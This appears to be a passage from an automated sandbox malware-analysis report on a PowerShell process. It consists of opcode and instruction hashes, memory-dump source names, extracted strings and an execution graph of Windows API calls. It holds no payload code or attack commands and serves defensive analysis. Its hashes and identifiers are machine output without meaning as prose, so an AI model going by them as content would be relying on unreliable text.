                                                                                                                                • Opcode Fuzzy Hash: 7a9387b586d2cad881149f5c188d1813ca2018dedcad800a4fe66c3346a9b5db
                                                                                                                                • Instruction Fuzzy Hash: DAF0A0353092908BCB0A6774A41C1AD3FA6DFC6328F0500AEE606CF283CE69090587DA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7b04832a02b86fd0abaa4cba9ba19af18422391def14e5446ef6bf160b710897
                                                                                                                                • Instruction ID: 799ecd1872256d74d92fe185bfc159ee954d6bf03234ccdd1dcac24814cdaefd
                                                                                                                                • Opcode Fuzzy Hash: 7b04832a02b86fd0abaa4cba9ba19af18422391def14e5446ef6bf160b710897
                                                                                                                                • Instruction Fuzzy Hash: 30E0862574D3D10B9B17927D64604AA6FE64EC712431E81FFE484CF713C8558C078351
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6260477642957c5a5cdd36863735382a6633dc73ecf31d958fbf24505a9b2d5d
                                                                                                                                • Instruction ID: 1e4acf6a0e3e0c0ac2629f635be74ef35ec6e8fef8a6eec37b939dda2878e8b4
                                                                                                                                • Opcode Fuzzy Hash: 6260477642957c5a5cdd36863735382a6633dc73ecf31d958fbf24505a9b2d5d
                                                                                                                                • Instruction Fuzzy Hash: 87F06D709003048BD360DF78E89C39ABBE9EB44310F00446DE20ECB380DB3968818B90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cbe8ae293e32bfc73359f50061016b9680841251b3d4acfa4a8a064df4b9efe2
                                                                                                                                • Instruction ID: f7ed1f27605dd80ad8cd00e617a10cc5285e27ac396259e1de716815a7810bc2
                                                                                                                                • Opcode Fuzzy Hash: cbe8ae293e32bfc73359f50061016b9680841251b3d4acfa4a8a064df4b9efe2
                                                                                                                                • Instruction Fuzzy Hash: 82E06D70D042899FC740EFB9C95125DFFF0AB0A600B2485AEC958D7302E7719612DFD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d4b4e150335bffa8d7559635aea5da2ee8fd3b4ac46a39829ce5118b406d975a
                                                                                                                                • Instruction ID: 13ef188cdf047625343da7776a431ea853080d7da32849c5b904b21340f93028
                                                                                                                                • Opcode Fuzzy Hash: d4b4e150335bffa8d7559635aea5da2ee8fd3b4ac46a39829ce5118b406d975a
                                                                                                                                • Instruction Fuzzy Hash: 2FE0263530425487CB083775B80C2AE7A9AEBC4729F00002EE60B8F382CF781A4283DA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f5184c03c7fb0c29f4da1fb4f8ca76d9e1e6a83e88ffa97eedf9a7355b88eb2e
                                                                                                                                • Instruction ID: 4d05151f67073e7fd6707f630861ea161a03051af63b917ad91b6b7b08a14ce5
                                                                                                                                • Opcode Fuzzy Hash: f5184c03c7fb0c29f4da1fb4f8ca76d9e1e6a83e88ffa97eedf9a7355b88eb2e
                                                                                                                                • Instruction Fuzzy Hash: 25D05E727C212117165430FE19046BBA5CECAC54A5746017EDA09D3385EC50FC0A03F2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c7d2996c424f741df7c4b151d1a2c6e8e7b2813c29deb3e24f163d289df1bbc0
                                                                                                                                • Instruction ID: 2e906817f4bbdf8e3428a41c93bff3f4cfa09c16686f6326c3b688f7973213ab
                                                                                                                                • Opcode Fuzzy Hash: c7d2996c424f741df7c4b151d1a2c6e8e7b2813c29deb3e24f163d289df1bbc0
                                                                                                                                • Instruction Fuzzy Hash: C7E08C317806140B8625A65EB81085F769EEFC4661310843EE10D8B380DE64E8058BD5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                • Instruction ID: 1b7ef91d439fa94a527adfb0e96c02d8aa84980f7475095d4f2a8da713c8d7dd
                                                                                                                                • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                • Instruction Fuzzy Hash: C6E08631B00014978B18A5AAD4504D9F7A5DBCC220F04847ED91AA7380DA3269168691
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f83d0df791d9cd45ecdd91ac575f3f9c1b3c365677995255d2a29c160855e23e
                                                                                                                                • Instruction ID: 3c19632c3ceca67cedb1dca36b0fe749be8d87ec48c72f02d0a0338e39bb6764
                                                                                                                                • Opcode Fuzzy Hash: f83d0df791d9cd45ecdd91ac575f3f9c1b3c365677995255d2a29c160855e23e
                                                                                                                                • Instruction Fuzzy Hash: 68E0DF30D18048CBCF19BBB4E45D4ED7FB4EE01311B40029DE8938A552EAB0098ACB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: fbc2e36770879ed406d287c84999daa155e2c87778eb992bd9476d0302883c4b
                                                                                                                                • Instruction ID: 5ee38abe47bd9bc85292fd97283a7653bc8646411f82afd1ea5b505db6626fa3
                                                                                                                                • Opcode Fuzzy Hash: fbc2e36770879ed406d287c84999daa155e2c87778eb992bd9476d0302883c4b
                                                                                                                                • Instruction Fuzzy Hash: 00E0DF34909286CBCB14EBA8E00986DBFB0EF0A204F0041ADE8068F703DA310881DF85
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                • Instruction ID: cf42f2985c77c4de0b14b0e653512d4020344280b399697eca6617aca49a83c9
                                                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                • Instruction Fuzzy Hash: 2BD04C71D042099F8780EFA9894156DFBF4AB48200B5085AA8919D7301E63156129BD1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 30fa9ce82d73ea575e05d5d43e48961234f75640729e6e53bfec8add3dd11dd2
                                                                                                                                • Instruction ID: 57c4412bb632ba04eb35293ce9aa82b3f97c302ad60e739934740d510210a6a3
                                                                                                                                • Opcode Fuzzy Hash: 30fa9ce82d73ea575e05d5d43e48961234f75640729e6e53bfec8add3dd11dd2
                                                                                                                                • Instruction Fuzzy Hash: 35D06731904109CBCB08BBA5F85E4BDBB78FA14301F40416EE91756291EA712A9ACAC9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c78d68ccbc039c79cc57d5cb92d609dfc8e3b8c274f239ffb95f1f02a5d0f9f8
                                                                                                                                • Instruction ID: 739c7c3d5bac41e69d2d2c2305a2c3f45a79bd3f5f63c77bcc8419635e8a9897
                                                                                                                                • Opcode Fuzzy Hash: c78d68ccbc039c79cc57d5cb92d609dfc8e3b8c274f239ffb95f1f02a5d0f9f8
                                                                                                                                • Instruction Fuzzy Hash: 1BD01234E0420ACF8708EF65E44A46DBBB8EB44200F00415DE9069B341EA305D41DFC5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 46fb93cdd68d9f690242f2136a3fae3f291f8b625a75e03647420a9934dfbb13
                                                                                                                                • Instruction ID: 69de06dd71f63fadb992ed750d943c503cbb06dc9bd60b4da847d5ddf3aca81f
                                                                                                                                • Opcode Fuzzy Hash: 46fb93cdd68d9f690242f2136a3fae3f291f8b625a75e03647420a9934dfbb13
                                                                                                                                • Instruction Fuzzy Hash: 5FD09E3404D3C46FC756AB7894648553F605D4312471504DFD486DF163C5668449CB26
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d0e3017f0615068372f39d5ada2720df9b1d30a1bd9b56bf04590451d1a49584
                                                                                                                                • Instruction ID: 0476f2be46bb6b3bd26c1c9d4649d47f48089a6f1ee0139517f6fe8af6264e10
                                                                                                                                • Opcode Fuzzy Hash: d0e3017f0615068372f39d5ada2720df9b1d30a1bd9b56bf04590451d1a49584
                                                                                                                                • Instruction Fuzzy Hash: 29C08C0440F3C00EDF43A3384AE92027FB2098342830A02CBC080CE423C868880AC763
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2b944a4684f8f8a696abc894813ff9e21257c44d4082111626c39184db30b994
                                                                                                                                • Instruction ID: 9aaa5fa13218b57b53ddcf79bb199f5528e1e45f8891ae3c0a9f027796c0f2de
                                                                                                                                • Opcode Fuzzy Hash: 2b944a4684f8f8a696abc894813ff9e21257c44d4082111626c39184db30b994
                                                                                                                                • Instruction Fuzzy Hash: 38B092340447088FC358AF79E4048147329FB4521978104ECE90E0A292CE76E889CA46
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: fbq$`Q]q$`Q]q$tP]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-810355167
                                                                                                                                • Opcode ID: 89210ccc4de1e6b0b5cbf58c9b16369dc58e42f49593e1fc8fa7fb024d91bebd
                                                                                                                                • Instruction ID: 3e7916812526296dc49130d2320b5ed3ab0f91e944c9e0379bb9d160f3d6a4ec
                                                                                                                                • Opcode Fuzzy Hash: 89210ccc4de1e6b0b5cbf58c9b16369dc58e42f49593e1fc8fa7fb024d91bebd
                                                                                                                                • Instruction Fuzzy Hash: 4671A2B0E2420EDFDB2D8E68C944BAA77F1BB47341F168055E8029B390C7B5DD85CBA1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-1910532044
                                                                                                                                • Opcode ID: 172fd7979748a6d36b61438385b71f1d620cba028a57ca6c9489115c3c32fd29
                                                                                                                                • Instruction ID: b8619b100dc6952914ea9301577ddfd851f07a4622068544255a0387e387a6d3
                                                                                                                                • Opcode Fuzzy Hash: 172fd7979748a6d36b61438385b71f1d620cba028a57ca6c9489115c3c32fd29
                                                                                                                                • Instruction Fuzzy Hash: F9A189B1B28305DFCB249A7A9850766BBF6AFC6710F18846AD446CF352DE35CC41C762
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$4']q$4']q$4']q$pioj$tP]q$tP]q
                                                                                                                                • API String ID: 0-1776749687
                                                                                                                                • Opcode ID: 084395398640417939dd89edcb4959c91e9840e94af659163beadb3ed7fea8a7
                                                                                                                                • Instruction ID: d8ea3e82820983a27481bb41e77914dfc2269dd8b14f6eaa99bff23872e2a646
                                                                                                                                • Opcode Fuzzy Hash: 084395398640417939dd89edcb4959c91e9840e94af659163beadb3ed7fea8a7
                                                                                                                                • Instruction Fuzzy Hash: EDD15AB1F142098FC7299B7894106AABBF6AFC6310F1984ABC546CB351CB75CC86C7A1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: fbq$4']q$4']q$4']q$4']q
                                                                                                                                • API String ID: 0-2283484764
                                                                                                                                • Opcode ID: b999cef4dee67e1e9fff7f7a8627ada665f33377745537dacce3e3861b4a0e57
                                                                                                                                • Instruction ID: 495969278222d45231b4b1b30ee0b38e1c78acc54588e01f172fb39d15c0c62d
                                                                                                                                • Opcode Fuzzy Hash: b999cef4dee67e1e9fff7f7a8627ada665f33377745537dacce3e3861b4a0e57
                                                                                                                                • Instruction Fuzzy Hash: 60D14771B182558FCB159B7898106AA7FA6EFC6310F14C0BBD546CF352DA358C86C7E2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-2353078639
                                                                                                                                • Opcode ID: 695ff6abcb84436d0b659b45f70926ee736795fabeabcf195324ae6d6c02d89c
                                                                                                                                • Instruction ID: 8ae0344c19c8f07c0298342afcc3cf6399b599881f83207deac5e570af16d5b8
                                                                                                                                • Opcode Fuzzy Hash: 695ff6abcb84436d0b659b45f70926ee736795fabeabcf195324ae6d6c02d89c
                                                                                                                                • Instruction Fuzzy Hash: FE5144B5B24346DFCB249A7A8810766BBB6AFC2611F24847BD447CB341CA35CC46C7A3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: `^q$`^q$`^q$`^q
                                                                                                                                • API String ID: 0-4294711580
                                                                                                                                • Opcode ID: fd0bc27df89c82f514d196ff7124cc57312fa9a686bf2f3b338e87d58eade7c0
                                                                                                                                • Instruction ID: d24c315cb71f0bfa41c8622f8dcc3551c62915c85816b35feffc64c8fbc73434
                                                                                                                                • Opcode Fuzzy Hash: fd0bc27df89c82f514d196ff7124cc57312fa9a686bf2f3b338e87d58eade7c0
                                                                                                                                • Instruction Fuzzy Hash: 30B1E774E012099FDB54DFA9D990A9DFBF6FF88300F20862AD419AB355DB34A905CF90
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2257080827.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_4780000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: `^q$`^q$`^q$`^q
                                                                                                                                • API String ID: 0-4294711580
                                                                                                                                • Opcode ID: c348ca7e0d035f45777ea89e2c3bcc778627f0f06fdea650b98dbbfd4dc6fd93
                                                                                                                                • Instruction ID: 1d855d1685eb78e3b1d8bb8155177b02802b91ae687708d5af289cd9ea238934
                                                                                                                                • Opcode Fuzzy Hash: c348ca7e0d035f45777ea89e2c3bcc778627f0f06fdea650b98dbbfd4dc6fd93
                                                                                                                                • Instruction Fuzzy Hash: 46B1C674E012099FDB58DFA9D980A9DFBF6FF88300F208629D419AB354DB34A945CF90
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-858218434
                                                                                                                                • Opcode ID: aa469334572c9f3652076a95d51762092b1463c530a6d9bfbf9323673cb92ad0
                                                                                                                                • Instruction ID: c17a4cb95e592d405cb363bc296f885ccf04dedad1c405a16002f74fe4e4ecae
                                                                                                                                • Opcode Fuzzy Hash: aa469334572c9f3652076a95d51762092b1463c530a6d9bfbf9323673cb92ad0
                                                                                                                                • Instruction Fuzzy Hash: 7A2126B1B243269BDB28553E9840B26A7D7ABD0711F24843AE907CBB82DD36CC518361
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000D.00000002.2281375618.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_13_2_76d0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                                                                                • API String ID: 0-978391646
                                                                                                                                • Opcode ID: 7b94d625fc2f1c5ea808405d0620b8eca01adca73f6d48c8953927b120eb67d3
                                                                                                                                • Instruction ID: 61d2ae9db5a3d62dbea23d62341a094e09f2b334b66543abdb016b69adb5e50f
                                                                                                                                • Opcode Fuzzy Hash: 7b94d625fc2f1c5ea808405d0620b8eca01adca73f6d48c8953927b120eb67d3
                                                                                                                                • Instruction Fuzzy Hash: 05018F61B1D3964FC72B123C58701A56FB26F83910B5A46E7C482CF297C9594C0A83A7

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:12.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:490
                                                                                                                                Total number of Limit Nodes:45
                                                                                                                                execution_graph 29520 25b5238 29521 25b524f 29520->29521 29527 25b4e0c 29521->29527 29523 25b52be 29532 5b91660 29523->29532 29536 5b916b8 29523->29536 29528 25b4e17 29527->29528 29540 5b26890 29528->29540 29545 5b26889 29528->29545 29529 25b7abe 29529->29523 29533 5b9165e 29532->29533 29533->29532 29649 5b912f4 29533->29649 29537 5b916c7 29536->29537 29538 5b912f4 2 API calls 29537->29538 29539 25b52c5 29538->29539 29541 5b268a0 29540->29541 29542 5b268dd 29541->29542 29550 5b2ade8 29541->29550 29575 5b2add9 29541->29575 29542->29529 29546 5b268a0 29545->29546 29547 5b268dd 29546->29547 29548 5b2ade8 7 API calls 29546->29548 29549 5b2add9 7 API calls 29546->29549 29547->29529 29548->29547 29549->29547 29551 5b2adeb 29550->29551 29552 5b2af1b 29551->29552 29555 5b2aebf 29551->29555 29553 5b22208 CreateWindowExW 29552->29553 29561 5b2aef0 29553->29561 29560 5b22208 CreateWindowExW 29555->29560 29558 5b2af35 29620 5b28e88 29558->29620 29560->29561 29600 5b28ef4 29561->29600 29562 5b2af3d 29563 5b2b047 29562->29563 29564 5b26890 7 API calls 29562->29564 29571 5b216b0 2 API calls 29563->29571 29572 5b216c0 2 API calls 29563->29572 29565 5b2afed 29564->29565 29568 5b24088 SetWindowLongW 29565->29568 29566 5b2b0a8 29624 5b2a8c1 29566->29624 29628 5b2a8d0 29566->29628 29567 5b2b0bc 29569 5b2b010 29568->29569 29569->29563 29632 5b28f64 29569->29632 29571->29566 29572->29566 29579 5b2ade6 29575->29579 29576 5b2af1b 29577 5b22208 CreateWindowExW 29576->29577 29578 5b2aef0 29577->29578 29580 5b28ef4 7 API calls 29578->29580 29579->29576 29582 5b2aebf 29579->29582 29581 5b2af2b 29580->29581 29583 5b28f04 7 API calls 29581->29583 29586 5b22208 CreateWindowExW 29582->29586 29584 5b2af35 29583->29584 29585 5b28e88 7 API calls 29584->29585 29587 5b2af3d 29585->29587 29586->29578 29588 5b2b047 29587->29588 29589 5b26890 7 API calls 29587->29589 29596 5b216b0 2 API calls 29588->29596 29597 5b216c0 2 API calls 29588->29597 29590 5b2afed 29589->29590 29593 5b24088 SetWindowLongW 29590->29593 29591 5b2b0a8 29598 5b2a8d0 7 API calls 29591->29598 29599 5b2a8c1 7 API calls 29591->29599 29592 5b2b0bc 29594 5b2b010 29593->29594 29594->29588 29595 5b28f64 7 API calls 29594->29595 29595->29588 29596->29591 29597->29591 29598->29592 29599->29592 29602 5b28eff 29600->29602 29601 5b2af2b 29606 5b28f04 29601->29606 29602->29601 29603 5b26890 7 API calls 29602->29603 29604 5b2d9f0 29603->29604 29605 5b24088 SetWindowLongW 29604->29605 29605->29601 29611 5b28f0f 29606->29611 29607 5b2dfa8 29607->29558 29608 5b2df21 29609 5b2df5a 29608->29609 29613 5b28f64 7 API calls 29608->29613 29610 5b28f64 7 API calls 29609->29610 29614 5b2df66 29610->29614 29611->29607 29611->29608 29612 5b2df74 29611->29612 29645 5b2ba14 7 API calls 29611->29645 29612->29607 29619 5b26890 7 API calls 29612->29619 29615 5b2df4c 29613->29615 29616 5b2da44 7 API calls 29614->29616 29639 5b2da44 29615->29639 29616->29612 29619->29607 29621 5b28e93 29620->29621 29622 5b26890 7 API calls 29621->29622 29623 5b2a914 29621->29623 29622->29623 29623->29562 29625 5b2a8dd 29624->29625 29626 5b28e88 7 API calls 29625->29626 29627 5b2a8e4 29626->29627 29627->29567 29629 5b2a8dd 29628->29629 29630 5b28e88 7 API calls 29629->29630 29631 5b2a8e4 29630->29631 29631->29567 29633 5b28f6f 29632->29633 29634 5b2fbee 29633->29634 29635 5b26890 7 API calls 29633->29635 29634->29563 29636 5b2fc48 29635->29636 29637 5b2e460 SendMessageW 29636->29637 29638 5b2fc59 29637->29638 29638->29563 29640 5b2da4f 29639->29640 29641 5b26890 7 API calls 29640->29641 29642 5b2fc48 29641->29642 29646 5b2e460 29642->29646 29645->29608 29647 5b2fc70 SendMessageW 29646->29647 29648 5b2fc59 29647->29648 29648->29609 29651 5b912ff 29649->29651 29653 5b91334 29651->29653 29652 5b917ad 29652->29652 29658 5b9133f 29653->29658 29654 5b91a28 29659 5b91a53 29654->29659 29662 5b915a8 29654->29662 29656 5b915a8 OleInitialize 29656->29654 29657 5b91a40 29666 5b93350 29657->29666 29670 5b93360 29657->29670 29658->29654 29658->29656 29658->29659 29659->29652 29663 5b915b3 29662->29663 29665 5b92df9 29663->29665 29674 5b92194 29663->29674 29665->29657 29668 5b933c5 29666->29668 29669 5b93412 29668->29669 29681 5b9225c 29668->29681 29669->29659 29672 5b933c5 29670->29672 29671 5b93412 29671->29659 29672->29671 29673 5b9225c DispatchMessageW 29672->29673 29673->29672 29675 5b9219f 29674->29675 29677 5b93113 29675->29677 29678 5b921b0 29675->29678 29677->29665 29679 5b93148 OleInitialize 29678->29679 29680 5b931ac 29679->29680 29680->29677 29682 5b940c8 DispatchMessageW 29681->29682 29683 5b94134 29682->29683 29683->29668 29684 bbd01c 29685 bbd034 29684->29685 29686 bbd08e 29685->29686 29693 5b24017 29685->29693 29699 5b21b5c 29685->29699 29703 5b21b6c 29685->29703 29711 5b21b69 29685->29711 29719 5b24d79 29685->29719 29727 5b24028 29685->29727 29694 5b2404e 29693->29694 29695 5b21b5c SetWindowLongW 29694->29695 29696 5b2405a 29695->29696 29697 5b21b6c 2 API calls 29696->29697 29698 5b2406f 29697->29698 29698->29686 29700 5b21b67 29699->29700 29733 5b21b94 29700->29733 29702 5b24167 29702->29686 29706 5b21b77 29703->29706 29704 5b24de9 29708 5b24de7 29704->29708 29748 5b21c94 29704->29748 29706->29704 29707 5b24dd9 29706->29707 29737 5b24f10 29707->29737 29742 5b24f00 29707->29742 29712 5b21b77 29711->29712 29713 5b24de9 29712->29713 29715 5b24dd9 29712->29715 29714 5b21c94 2 API calls 29713->29714 29716 5b24de7 29713->29716 29714->29716 29717 5b24f10 2 API calls 29715->29717 29718 5b24f00 2 API calls 29715->29718 29717->29716 29718->29716 29722 5b24db5 29719->29722 29720 5b24de9 29721 5b21c94 2 API calls 29720->29721 29724 5b24de7 29720->29724 29721->29724 29722->29720 29723 5b24dd9 29722->29723 29725 5b24f10 2 API calls 29723->29725 29726 5b24f00 2 API calls 29723->29726 29725->29724 29726->29724 29728 5b2404e 29727->29728 29729 5b21b5c SetWindowLongW 29728->29729 29730 